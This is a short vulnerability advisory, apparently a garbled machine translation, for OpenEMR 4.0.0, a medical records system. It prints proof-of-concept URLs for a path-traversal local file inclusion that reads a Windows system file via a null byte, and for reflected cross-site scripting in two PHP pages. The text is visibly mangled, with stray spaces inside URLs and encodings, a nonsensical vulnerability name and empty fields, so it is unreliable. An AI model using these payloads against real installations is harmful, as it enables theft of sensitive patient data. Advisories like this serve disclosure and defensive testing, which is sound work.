OpenEMR is a medical management system that can be used for medical practice management, electronic medical records, prescription writing, and medical bill application. Multiple security vulnerabilities in EMR 4.0.0 may cause leakage of sensitive information.
[+] Info:
~~~~~~~~~
OpenEMR 4.0.0 Multiple Vulnerabilities
Software ......
Vulnerability ...... Local File transfer sion
Threat Level ...... Critical (4/5)
Download ...... http://www.oemr.org/
Discovery Date ......
Tested On...
------------------------------------------------------------------------
Author ...... AutoSec Tools
Site ...... http://www.autosectools.com/
Email ........................ John Leitch <john@autosectools.com>
[+] Poc:
~~~~~~~~~
-- LFI PoC --
Windows % 2fwin. ini % 00 "> http: // localhost/openemr-4.0.0/index. php? Site = .. % 2f .. % 2f .. % 2f .. % 2f .. % 2f .. % 2f .. % 2f .. % 2 fwindows % 2fwin. ini % 00
-- XSS PoC --
Http: /localhost/openemr-4.0.0/setup. php? Site = % 3 Cscript % 3 Ealert (0) % 3C/script % 3E
Http: // localhost/openemr-4.0.0/gacl/admin/object_search.php? Object_type = & action = & src_form = % 22% 3E % 3 Cscript % 3 Ealert % 280% 29% 3C/script % 3E & section_value = % 22% 3E % 3 Cscript % 3 Ealert % 280% 29% 3C/script % 3E
[+] Reference:
~~~~~~~~~
Http://www.exploit-db.com/exploits/17118